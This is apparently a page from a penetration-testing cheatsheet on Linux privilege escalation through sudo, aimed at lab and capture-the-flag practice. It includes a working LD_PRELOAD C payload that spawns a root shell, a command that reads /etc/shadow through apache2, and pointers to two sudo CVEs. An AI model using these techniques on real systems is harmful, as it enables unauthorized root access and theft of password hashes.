coffeetohack
  • Introduction
  • Methodology
  • Cheatsheet
    • Ports
    • Nmap
    • Directory Bruteforce
    • Password Cracking
    • Web Server
    • Shells
    • TTY Shells
    • File Transfers
    • XSS | SQLi
    • LFI / RFI
    • File Uploads
    • Port Forwarding
  • Framework/Application
    • CMS Made Simple
    • Blundit
    • Wordpress
    • OctoberCMS
    • Tomcat
  • Windows PrivEsc
    • Scheduled Tasks
    • Stored Passwords
    • Installed Apps
    • Unquoted Service Path
    • Binary Paths
    • DLL Hijacking
    • Startup Apps
    • Executable Files
    • Registry
    • Run As
  • Linux PrivEsc
    • Sudo
    • SUID
    • Capabilities
    • Scheduled Tasks
    • NFS Root Squashing
    • Docker
  • Buffer Overflow
    • dostackbufferoverflow
    • BoF 1
    • Vulnserver
    • Brainpan
    • Brainstorm
  • Initial Shell Exploits
  • PrivEsc Exploits
  • Cisco Packet Tracer
  • Active Directory
    • Methodology
    • LLMNR Poisioning
    • Cracking Hashes
    • SMB Relay
    • IPv6 Attacks
    • PowerView
    • Bloodhound
    • Pass The Hash
    • Token Impersonation
    • Kerberoasting
    • GPP Attack
    • URL File Attack
    • PrintNightmare
    • Mimikatz
    • Golden Ticket Attack
  • OSINT
Powered by GitBook
On this page
  • SUDO SHELL ESCAPING:
  • INTENDED FUNCTIONALITY:
  • LD_PRELOAD:
  • CVE-2019-14287: sudo 1.8.27
  • CVE-2019-18634:

Was this helpful?

  1. Linux PrivEsc

Sudo

PreviousLinux PrivEscNextSUID

Last updated 3 years ago

Was this helpful?

SUDO SHELL ESCAPING:

Use GTFO bins:

Practice:

INTENDED FUNCTIONALITY:

When you can't find an exploit on GTFO bins but you can abuse some functionality of the program running. Suppose the program is apache2 then search: sudo apache2 privilege escalation

Some of the exploits wont let you get a shell but they can help you view system files. It errors out the line which it doesn't understand.

Ex: apache2, wget

sudo apache2 -f /etc/shadow

LD_PRELOAD:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
    

CVE-2019-14287: sudo 1.8.27

If we get (All, !root) /bin/bash

CVE-2019-18634:

Find sudo version using: sudo -V

If the version is 1.8.21p2 and password feedback is enabled

https://gtfobins.github.io/
https://tryhackme.com/room/privescplayground